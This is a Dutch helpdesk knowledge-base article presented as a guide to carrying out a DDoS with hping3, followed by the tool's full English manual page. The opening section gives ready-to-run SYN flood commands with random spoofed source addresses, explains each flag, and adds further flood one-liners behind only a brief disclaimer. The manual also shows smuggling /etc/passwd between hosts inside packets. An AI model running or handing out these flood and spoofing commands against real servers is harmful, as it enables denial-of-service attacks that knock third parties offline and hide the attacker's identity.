De Help Desk punt NL
De Helpdesk > De Helpdesk > Kennisbank

DDOS via hping3 linux


Eerst moeten we hping3 installeren, dap doen we via de terminal.

Voer uit in ubuntu / mint # sudo apt-get install hping3

Of in Centos / Fedora of Redhat # sudo yum install hping3

Nu kunnen we als root uitvoeren:

# hping3 -c 10000 -d 120 -S -w 64 -p 21 --flood --rand-source

Een kleine uitleg bij deze commandoregel:

  1. hping3 = De naam van het programma het uitvoerbare bestand.
  2. -c 100000 = Het aantal pakketten wat we verzenden.
  3. -d 120 = De afmetingen van het verzonden pakket.
  4. -S = We verzenden alleen SYN pakketen.
  5. -w 64 = TCP afmetingen.
  6. -p 21 = De bestemmingespoort (21 is de FTP poort). Maar je kan gebruiken wat je wil.
  7. --flood = Verzenden van pakketten zo snel als mogelijk is, zonder een antwoord af te wachten
  8. --rand-source = Gebruik van "Random" afzender IP Adressen. Ja kunt ook -a of –spoof gebruiken om hostnamen te verbergen
  9. = De server die we pingen.

Gebruik deze techniek alleen om je eigen servers te testen, en geen productieomgeving, wij nemen geen enkele verantwoordelijkheid voor verkeerd gebruik of misbruik van deze informatie.

Nog een paar ander voorbeelden:

# hping3 -S --flood -V
# hping3 -S -P -U --flood -V --rand-source

En hieronder de manual, in het Engels ;)


       hping3 - send (almost) arbitrary TCP/IP packets to network hosts

       hping3 [ -hvnqVDzZ012WrfxykQbFSRPAUXYjJBuTG ] [ -c count ] [ -i wait ] [ --fast ] [ -I interface ] [ -9 signature ] [ -a host ] [
       -t ttl ] [ -N ip id ] [ -H ip protocol ] [ -g fragoff ] [ -m mtu ] [ -o tos ] [ -C icmp type ] [ -K icmp code ] [ -s source  port
       ]  [  -p[+][+]  dest  port  ] [ -w tcp window ] [ -O tcp offset ] [ -M tcp sequence number ] [ -L tcp ack ] [ -d data size ] [ -E
       filename ] [ -e signature ] [ --icmp-ipver version ] [ --icmp-iphlen length ] [ --icmp-iplen  length  ]  [  --icmp-ipid  id  ]  [
       --icmp-ipproto  protocol  ] [ --icmp-cksum checksum ] [ --icmp-ts ] [ --icmp-addr ] [ --tcpexitcode ] [ --tcp-mss ] [ --tcp-time‐
       stamp ] [ --tr-stop ] [ --tr-keep-ttl ] [ --tr-no-rtt ] [ --rand-dest ] [ --rand-source ] [ --beep ] hostname

hping3 is a network tool able to send custom TCP/IP packets and to display target  replies  like  ping  program  does  with  ICMP replies.  hping3  handle  fragmentation,  arbitrary packets body and size and can be used in order to transfer files encapsulated  under supported protocols. Using hping3 you are able to perform at least the following stuff:

        - Test firewall rules
        - Advanced port scanning
        - Test net performance using different protocols,
          packet size, TOS (type of service) and fragmentation.
        - Path MTU discovery
        - Transferring files between even really fascist firewall
        - Traceroute-like under different protocols.
        - Firewalk-like usage.
        - Remote OS fingerprinting.
        - TCP/IP stack auditing.
        - A lot of others.

It's also a good didactic tool to learn TCP/IP.  hping3 is developed and maintained by and is  licensed  under GPL version 2. Development is open so you can send me patches, suggestion and affronts without inhibitions.

primary  site  at  You can found both the stable release and the instruction to download the latest sourcecode at

       -h --help
              Show an help screen on standard output, so you can pipe to less.

       -v --version
              Show version information and API used to access to data link layer, linux sock packet or libpcap.

       -c --count count
              Stop after sending (and receiving) count response packets. After last packet was  send  hping3  wait  COUNTREACHED_TIMEOUT
              seconds target host replies. You are able to tune COUNTREACHED_TIMEOUT editing hping2.h

       -i --interval
              Wait  the  specified  number of seconds or micro seconds between sending each packet.  --interval X set wait to X seconds,
              --interval uX set wait to X micro seconds.  The default is to wait one second between each packet. Using hping3 to  trans‐
              fer  files  tune  this  option  is  really  important  in  order  to  increase transfer rate. Even using hping3 to perform
              idle/spoofing scanning you should tune this option, see HPING3-HOWTO for more information.

       --fast Alias for -i u10000. Hping will send 10 packets for second.

              Alias for -i u1. Faster then --fast ;) (but not as fast as your  computer  can  send  packets  due  to  the  signal-driven

              Sent  packets  as fast as possible, without taking care to show incoming replies.  This is ways faster than to specify the
              -i u0 option.

       -n --numeric
              Numeric output only, No attempt will be made to lookup symbolic names for host addresses.

       -q --quiet
              Quiet output. Nothing is displayed except the summary lines at startup time and when finished.

       -I --interface interface name
              By default on linux and BSD systems hping3 uses default routing interface.  In other systems or when there is  no  default
              route  hping3  uses  the first non-loopback interface.  However you are able to force hping3 to use the interface you need
              using this option. Note: you don't need to specify the whole name, for example -I et will match eth0  ethernet0  myet1  et
              cetera. If no interfaces match hping3 will try to use lo.

       -V --verbose
              Enable verbose output. TCP replies will be shown as follows:

              len=46 ip= flags=RA DF seq=0 ttl=255 id=0 win=0 rtt=0.4 ms tos=0 iplen=40 seq=0 ack=1380893504 sum=2010 urp=0

       -D --debug
              Enable  debug mode, it's useful when you experience some problem with hping3. When debug mode is enabled you will get more
              information about interface detection, data link layer access, interface settings, options  parsing,  fragmentation,  HCMP
              protocol and other stuff.

       -z --bind
              Bind  CTRL+Z to time to live (TTL) so you will able to increment/decrement ttl of outgoing packets pressing CTRL+Z once or

       -Z --unbind
              Unbind CTRL+Z so you will able to stop hping3.

       --beep Beep for every matching received packet (but not for ICMP errors).

       Default protocol is TCP, by default hping3 will send tcp headers to target host's port 0 with a winsize of  64  without  any  tcp
       flag  on. Often this is the best way to do an 'hide ping', useful when target is behind a firewall that drop ICMP. Moreover a tcp
       null-flag to port 0 has a good probability of not being logged.

       -0 --rawip
              RAW IP mode, in this mode hping3 will send IP header with data appended with --signature and/or --file, see also --ipproto
              that allows you to set the ip protocol field.

       -1 --icmp
              ICMP  mode,  by  default  hping3 will send ICMP echo-request, you can set other ICMP type/code using --icmptype --icmpcode

       -2 --udp
              UDP mode, by default hping3 will send udp to target host's port 0.  UDP header tunable options are the following:  --base‐
              port, --destport, --keep.

       -8 --scan
              Scan  mode, the option expects an argument that describes groups of ports to scan. port groups are comma separated: a num‐
              ber describes just a single port, so 1,2,3 means port 1, 2 and 3. ranges are specified using a  start-end  notation,  like
              1-1000,  that  tell hping to scan ports between 1 and 1000 (included). the special word all is an alias for 0-65535, while
              the special word known includes all the ports listed in /etc/services.
              Groups can be combined, so the following command line will scan ports between 1 and 1000 AND port 8888 AND ports listed in
              /etc/services: hping --scan 1-1000,8888,known -S
              Groups  can  be  negated (subtracted) using a ! character as prefix, so the following command line will scan all the ports
              NOT listed in /etc/services in the range 1-1024: hping --scan '1-1024,!known' -S
              Keep in mind that while hping seems much more like a port scanner in this mode, most of the hping switches are still  hon‐
              ored,  so  for  example to perform a SYN scan you need to specify the -S option, you can change the TCP windows size, TTL,
              control the IP fragmentation as usually, and so on. The only real difference is that  the  standard  hping  behaviors  are
              encapsulated into a scanning algorithm.
              Tech  note:  The  scan mode uses a two-processes design, with shared memory for synchronization. The scanning algorithm is
              still not optimal, but already quite fast.
              Hint: unlike most scanners, hping shows some interesting info about received packets, the IP ID, TCP win, TTL, and so  on,
              don't forget to look at this additional information when you perform a scan! Sometimes they shows interesting details.

       -9 --listen signature
              HPING3  listen  mode,  using  this  option  hping3  waits for packet that contain signature and dump from signature end to
              packet's end. For example if hping3 --listen TEST reads a packet that contain 234-09sdflkjs45-TESThello_world it will dis‐
              play hello_world.

       -a --spoof hostname
              Use this option in order to set a fake IP source address, this option ensures that target will not gain your real address.
              However replies will be sent to spoofed address, so you will can't see them. In order to see how it's possible to  perform
              spoofed/idle scanning see the HPING3-HOWTO.

              This  option enables the random source mode.  hping will send packets with random source address. It is interesting to use
              this option to stress firewall state tables, and other per-ip basis dynamic tables inside the TCP/IP stacks  and  firewall

              This  option  enables the random destination mode.  hping will send the packets to random addresses obtained following the
              rule you specify as the target host. You need to specify a numerical IP address as target host  like  10.0.0.x.   All  the
              occurrences of x will be replaced with a random number in the range 0-255. So to obtain Internet IP addresses in the whole
              IPv4 space use something like hping x.x.x.x --rand-dest.  If you are not sure about what kind of addresses  your  rule  is
              generating  try  to use the --debug switch to display every new destination address generated.  When this option is turned
              on, matching packets will be accept from all the destinations.
              Warning: when this option is enabled hping can't detect the right outgoing interface for the packets, so  you  should  use
              the --interface option to select the desired outgoing interface.

       -t --ttl time to live
              Using this option you can set TTL (time to live) of outgoing packets, it's likely that you will use this with --traceroute
              or --bind options. If in doubt try `hping3 -t 1 --traceroute'.

       -N --id
              Set ip->id field. Default id is random but if fragmentation is turned on and id isn't specified  it  will  be  getpid()  &
              0xFFFF, to implement a better solution is in TODO list.

       -H --ipproto
              Set the ip protocol in RAW IP mode.

       -W --winid
              id  from  Windows* systems before Win2k has different byte ordering, if this option is enable hping3 will properly display
              id replies from those Windows.

       -r --rel
              Display id increments  instead  of  id.  See  the  HPING3-HOWTO  for  more  information.  Increments  aren't  computed  as
              id[N]-id[N-1] but using packet loss compensation. See relid.c for more information.

       -f --frag
              Split  packets  in  more fragments, this may be useful in order to test IP stacks fragmentation performance and to test if
              some packet filter is so weak that can be passed using tiny fragments (anachronistic). Default 'virtual mtu' is 16  bytes.
              see also --mtu option.

       -x --morefrag
              Set more fragments IP flag, use this option if you want that target host send an ICMP time-exceeded during reassembly.

       -y --dontfrag
              Set don't fragment IP flag, this can be used to perform MTU path discovery.

       -g --fragoff fragment offset value
              Set the fragment offset.

       -m --mtu mtu value
              Set  different 'virtual mtu' than 16 when fragmentation is enabled. If packets size is greater that 'virtual mtu' fragmen‐
              tation is automatically turned on.

       -o --tos hex_tos
              Set Type Of Service (TOS), for more information try --tos help.

       -G --rroute
              Record route. Includes the RECORD_ROUTE option in each packet sent and displays the route buffer of returned packets. Note
              that  the  IP  header  is only large enough for nine such routes. Many hosts ignore or discard this option. Also note that
              using hping you are able to use record route even if target host filter ICMP. Record route is an IP option,  not  an  ICMP
              option, so you can use record route option even in TCP and UDP mode.

       -C --icmptype type
              Set icmp type, default is ICMP echo request (implies --icmp).

       -K --icmpcode code
              Set icmp code, default is 0 (implies --icmp).

              Set IP version of IP header contained into ICMP data, default is 4.

              Set IP header length of IP header contained into ICMP data, default is 5 (5 words of 32 bits).

              Set IP packet length of IP header contained into ICMP data, default is the real length.

              Set IP id of IP header contained into ICMP data, default is random.

              Set IP protocol of IP header contained into ICMP data, default is TCP.

              Set ICMP checksum, for default is the valid checksum.

              Alias for --icmptype 13 (to send ICMP timestamp requests).

              Alias for --icmptype 17 (to send ICMP address mask requests).

       -s --baseport source port
              hping3  uses source port in order to guess replies sequence number. It starts with a base source port number, and increase
              this number for each packet sent. When packet  is  received  sequence  number  can  be  computed  as  replies.dest.port  -
              base.source.port.  Default base source port is random, using this option you are able to set different number. If you need
              that source port not be increased for each sent packet use the -k --keep option.

       -p --destport [+][+]dest port
              Set destination port, default is 0. If '+' character precedes dest port number  (i.e.  +1024)  destination  port  will  be
              increased  for  each  reply  received.  If  double  '+'  precedes dest port number (i.e. ++1024), destination port will be
              increased for each packet sent.  By default destination port can be modified interactively using CTRL+z.

       --keep keep still source port, see --baseport for more information.

       -w --win
              Set TCP window size. Default is 64.

       -O --tcpoff
              Set fake tcp data offset. Normal data offset is tcphdrlen / 4.

       -M --tcpseq
              Set the TCP sequence number.

       -L --tcpack
              Set the TCP ack.

       -Q --seqnum
              This option can be used in order to collect sequence numbers generated by target host. This can be useful when you need to
              analyze whether TCP sequence number is predictable. Output example:

              #hping3 win98 --seqnum -p 139 -S -i u1 -I eth0
              HPING uaz (eth0 S set, 40 headers + 0 data bytes
              2361294848 +2361294848
              2411626496 +50331648
              2545844224 +134217728
              2713616384 +167772160
              2881388544 +167772160
              3049160704 +167772160
              3216932864 +167772160
              3384705024 +167772160
              3552477184 +167772160
              3720249344 +167772160
              3888021504 +167772160
              4055793664 +167772160
              4223565824 +167772160

              The  first  column reports the sequence number, the second difference between current and last sequence number. As you can
              see target host's sequence numbers are predictable.

       -b --badcksum
              Send packets with a bad UDP/TCP checksum.

              Enable the TCP MSS option and set it to the given value.

              Enable the TCP timestamp option, and try to guess the timestamp update frequency and the remote system uptime.

       -F --fin
              Set FIN tcp flag.

       -S --syn
              Set SYN tcp flag.

       -R --rst
              Set RST tcp flag.

       -P --push
              Set PUSH tcp flag.

       -A --ack
              Set ACK tcp flag.

       -U --urg
              Set URG tcp flag.

       -X --xmas
              Set Xmas tcp flag.

       -Y --ymas
              Set Ymas tcp flag.

       -d --data data size
              Set packet body size. Warning, using --data 40 hping3 will not generate  0  byte  packets  but  protocol_header+40  bytes.
              hping3  will display packet size information as first line output, like this: HPING (ppp0 NO
              FLAGS are set, 40 headers + 40 data bytes

       -E --file filename
              Use filename contents to fill packet's data.

       -e --sign signature
              Fill first signature length bytes of data with signature.  If the signature length is bigger than data size an error  mes‐
              sage  will  be displayed.  If you don't specify the data size hping will use the signature size as data size.  This option
              can be used safely with --file filename option, remainder data space will be filled using filename.

       -j --dump
              Dump received packets in hex.

       -J --print
              Dump received packets' printable characters.

       -B --safe
              Enable safe protocol, using this option lost packets in file transfers will be resent. For example in order to  send  file
              /etc/passwd from host A to host B you may use the following:
              # hping3 host_b --udp -p 53 -d 100 --sign signature --safe --file /etc/passwd
              # hping3 host_a --listen signature --safe --icmp

       -u --end
              If  you  are using --file filename option, tell you when EOF has been reached. Moreover prevent that other end accept more
              packets. Please, for more information see the HPING3-HOWTO.

       -T --traceroute
              Traceroute mode. Using this option hping3 will increase ttl for each ICMP time to live  0  during  transit  received.  Try
              hping3  host  --traceroute.  This option implies --bind and --ttl 1. You can override the ttl of 1 using the --ttl option.
              Since 2.0.0 stable it prints RTT information.

              Keep the TTL fixed in traceroute mode, so you can monitor just one hop in the route. For example, to monitor how  the  5th
              hop changes or how its RTT changes you can try hping3 host --traceroute --ttl 5 --tr-keep-ttl.

              If  this option is specified hping will exit once the first packet that isn't an ICMP time exceeded is received. This bet‐
              ter emulates the traceroute behavior.

              Don't show RTT information in traceroute mode. The ICMP time exceeded RTT  information  aren't  even  calculated  if  this
              option is set.

              Exit  with last received packet tcp->th_flag as exit code. Useful for scripts that need, for example, to known if the port
              999 of some host reply with SYN/ACK or with RST in response to SYN, i.e. the service is up or down.

       The standard TCP output format is the following:

       len=46 ip= flags=RA DF seq=0 ttl=255 id=0 win=0 rtt=0.4 ms

       len is the size, in bytes, of the data captured from the data link layer excluding the data link header size. This may not  match
       the IP datagram size due to low level transport layer padding.

       ip is the source ip address.

       flags  are  the TCP flags, R for RESET, S for SYN, A for ACK, F for FIN, P for PUSH, U for URGENT, X for not standard 0x40, Y for
       not standard 0x80.

       If the reply contains DF the IP header has the don't fragment bit set.

       seq is the sequence number of the packet, obtained using the source port for TCP/UDP packets, the sequence field for  ICMP  pack‐

       id is the IP ID field.

       win is the TCP window size.

       rtt is the round trip time in milliseconds.

       If you run hping using the -V command line switch it will display additional information about the packet, example:

       len=46 ip= flags=RA DF seq=0 ttl=255 id=0 win=0 rtt=0.4 ms tos=0 iplen=40 seq=0 ack=1223672061 sum=e61d urp=0

       tos is the type of service field of the IP header.

       iplen is the IP total len field.

       seq and ack are the sequence and acknowledge 32bit numbers in the TCP header.

       sum is the TCP header checksum value.

       urp is the TCP urgent pointer value.

       The standard output format is:

       len=46 ip= seq=0 ttl=64 id=0 rtt=6.0 ms

       The field meaning is just the same as the TCP output meaning of the same fields.

       An example of ICMP output is:

       ICMP Port Unreachable from ip=

       It is very simple to understand. It starts with the string "ICMP" followed by the description of the ICMP error, Port Unreachable
       in the example. The ip field is the IP source address of the IP datagram containing the ICMP error, the name field  is  just  the
       numerical address resolved to a name (a dns PTR request) or UNKNOWN if the resolution failed.

       The ICMP Time exceeded during transit or reassembly format is a bit different:

       TTL 0 during transit from ip=

       TTL 0 during reassembly from ip= name=UNKNOWN

       The only difference is the description of the error, it starts with TTL 0.

       Salvatore   Sanfilippo   <>,   with   the   help   of   the   people   mentioned   in   AUTHORS   file  and  at

       Even using the --end and --safe options to transfer files the final packet will be padded with 0x00 bytes.

       Data is read without care about alignment, but alignment is enforced in the data structures.  This will not be  a  problem  under
       i386 but, while usually the TCP/IP headers are naturally aligned, may create problems with different processors and bogus packets
       if there is some unaligned access around the code (hopefully none).

       On solaris hping does not work on the loopback interface. This seems a solaris problem, as stated in the tcpdump-workers  mailing
       list, so the libpcap can't do nothing to handle it properly.

       ping(8), traceroute(8), ifconfig(8), nmap(1)

                            2001 Aug 14                            HPING3(8)


Was dit artikel bruikbaar? ja / nee
Gerelateerde artikelen DDoS filter
How TO install/Configure APF (Advanced Policy Firewall) Firewall
NetTools 98/ME/2000/XP/2003/VISTA/7/8
HTTP Status Codes voor Beginners
DNS instellen via Webmin
Cracking WPA2 PSK with Backtrack 4, aircrack-ng and John The Ripper
MikroTik RouterBoard 1100Hx2 with 1U rackmount case
MikroTik RouterBoard 1100AHx2 with 1U rackmount case
Leuke website-widgets voor je bezoekers
Artikel details
Artikel ID: 265
Categorie: BackTrack
Zoekwoorden ping, hping3, hping, spoof, DDOS, aanval, attack, target, IP, adres, pakket, poort, TCP, handleiding, manual
Datum toegevoegd: 16-Apr-2015 03:39:58
Aantal bekeken: 1869
Beoordeling (Stemmen): Artikel beoordeeld 3.5/5.0 (11)

« Ga terug